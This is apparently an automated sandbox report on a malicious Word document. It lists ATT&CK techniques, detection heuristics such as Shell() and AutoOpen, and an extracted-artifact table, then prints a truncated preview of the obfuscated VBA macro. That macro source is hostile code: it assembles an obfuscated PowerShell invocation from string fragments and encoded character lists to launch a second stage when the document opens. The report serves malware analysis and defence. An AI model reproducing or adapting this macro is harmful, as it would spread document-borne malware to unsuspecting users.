Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro together with the critical OLE_VBA_SHELL heuristic firing indicates that this execution is triggered automatically when the document is opened. The script itself is heavily obfuscated, making it difficult to determine the exact payload, but the intent is clearly to execute a secondary stage.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27312 bytes |

SHA-256: 4cd77aed10becb6a6004e62064e0d98bc6c91e608d0a50ddf80378daaee4e40a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "KkYRTjKtTWl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UJNLNMoFTJi"
Function zZkwj()
On Error Resume Next
vIcZQ = (qEKjFJ * 81842 + 95809 * CInt(QiwFNr - CDbl(48878)) * 67182 * Oct(7024))
uQoBmjFu = "He" + "ll" + " .(" + " (" + "[st" + "RIN" + "g]"
lTXDm = (FzVLP * 13289 + 4923 * CInt(AwHRP - CDbl(55686)) * 55591 * Oct(28500))
REzPBHwCMWz = "$v" + "er" + "BO" + "sEp"
zAlkn = (RWZYEi * 15329 + 37328 * CInt(XhzKV - CDbl(74096)) * 64707 * Oct(17572))
GSiplVb = "rEf" + "eRE" + "NC" + "e)" + "[1" + ",3]" + "+'x"
YEPjHT = (sXGXCB * 31523 + 34715 * CInt(Eopiw - CDbl(91724)) * 85331 * Oct(59360))
pskzw = "'-" + "Jo" + "IN" + "''" + ") " + "([s"
uhdSt = (RrKMiQ * 64791 + 28679 * CInt(zLGBv - CDbl(99009)) * 43480 * Oct(33512))
PvktbUuY = "tRI" + "ng" + "]::" + "jOI" + "N("
qRzrad = (MkdNmz * 49816 + 56910 * CInt(GKqDjD - CDbl(43007)) * 49714 * Oct(69112))
zzTShjO = " '" + "' " + ", (" + " '" + "46" + "p71" + "X8"
morjGX = (vccca * 32504 + 63325 * CInt(WjDBTA - CDbl(72481)) * 56461 * Oct(40150))
HTkWqZJW = "9," + "12" + "5H8" + "2," + "73w"
zZkwj = uQoBmjFu + REzPBHwCMWz + GSiplVb + pskzw + PvktbUuY + zzTShjO + HTkWqZJW
ofNwmu = (HpqoV * 1858 + 45103 * CInt(WCzBDf - CDbl(88104)) * 19313 * Oct(38909))
End Function
Function GowZhajMrNu()
On Error Resume Next
XSYQk = (LWtRr * 4572 + 93976 * CInt(hESaqv - CDbl(2671)) * 59929 * Oct(62478))
hJWZDT = "42" + "E55" + "{42" + "{1" + "00,"
wwocR = (uVtmP * 54703 + 98785 * CInt(FpcwGF - CDbl(97014)) * 38999 * Oct(9996))
vIbAXku = "11" + "1-" + "12" + "5w" + "39" + ",10"
TzNST = (LslNT * 73558 + 24456 * CInt(FkWWJK - CDbl(50111)) * 9619 * Oct(10265))
ojBXlszTWJJ = "1," + "104" + "~9" + "6,1" + "11" + "X1"
VATCYa = (csjIS * 91862 + 53934 * CInt(UaXql - CDbl(45249)) * 37146 * Oct(55485))
ZojDkTfYni = "05~" + "126" + "H4" + "2~1"
GowZhajMrNu = hJWZDT + vIbAXku + ojBXlszTWJJ + ZojDkTfYni
tWjcLu = (OtmzSF * 16764 + 38292 * CInt(Artjb - CDbl(75002)) * 78414 * Oct(89473))
End Function
Function ZwjpGSJK()
On Error Resume Next
okCOT = (CXZIB * 83094 + 69920 * CInt(wwtYJ - CDbl(58594)) * 67311 * Oct(29208))
lljFzLrKj = "20~" + "107" + "-1" + "00G" + "11" + "0H1" + "01"
Dflja = (SGhoIW * 19884 + 59840 * CInt(ajvuf - CDbl(97)) * 34882 * Oct(38780))
iErAjOPt = "-10" + "3G4" + "9X4" + "6p6" + "7w1"
auhhO = (QlZRwj * 66035 + 44630 * CInt(bHBUCc - CDbl(89482)) * 77517 * Oct(38003))
uOiQqA = "20" + "E95" + ",83" + "~8" + "8H"
wZiojS = (KUGfPk * 85054 + 3677 * CInt(WzsjQ - CDbl(84474)) * 23273 * Oct(37668))
uHuSDOjNvTz = "105" + ",4" + "2{"
YwwRo = (GNoQGh * 94668 + 80454 * CInt(NYNQwL - CDbl(44043)) * 18548 * Oct(35036))
GBbIbU = "55~" + "42" + "p1" + "00" + "H1" + "11" + "~12"
FwvncG = (PULTn * 86904 + 62491 * CInt(ZBvbvr - CDbl(49138)) * 14861 * Oct(85854))
rZlqUu = "5~" + "39" + "E1" + "01" + ",1"
ZwjpGSJK = lljFzLrKj + iErAjOPt + uOiQqA + uHuSDOjNvTz + GBbIbU + rZlqUu
sivXH = (ofoii * 20096 + 49786 * CInt(KsRci - CDbl(61363)) * 50228 * Oct(59985))
End Function
Function Kajtj()
On Error Resume Next
qXJahW = (fpDVjc * 35619 + 85131 * CInt(JfHFz - CDbl(85079)) * 28259 * Oct(53861))
UhBwDwPkFYP = "04" + "w9" + "6H1"
RDZwcM = (NzEzza * 12924 + 18231 * CInt(CtHEd - CDbl(65655)) * 49732 * Oct(49130))
cSJwDtSXL = "11H" + "105" + "G12" + "6-"
VASaj = (IhrQSM * 68055 + 23699 * CInt(cWfNsO - CDbl(67543)) * 47403 * Oct(96460))
WPQbfs = "42{" + "89" + "~11" + "5-"
vwHXG = (dAjHMZ * 75484 + 26347 * CInt(qQiqq - CDbl(80806)) * 36926 * Oct(63342))
mamGu = "12" + "1,1" + "26w"
cHDMj = (mbUXn * 98118 + 2379 * CInt(ljpLD - CDbl(8858)) * 58240 * Oct(5034))
wfmSwEaXc = "11" + "1G1" + "03"
Kajtj = UhBwDwPkFYP + cSJwDtSXL + WPQbfs + mamGu + wfmSwEaXc
RGBwAi = (McSqu * 98162 + 62315 * CInt(TdVkF - CDbl(30588)) * 49452 * Oct(15080))
End Function
Function jizVi()
On Error Resume Next
FzJBiP = (mZYlFf * 7405 + 72717 * CIn
... (truncated)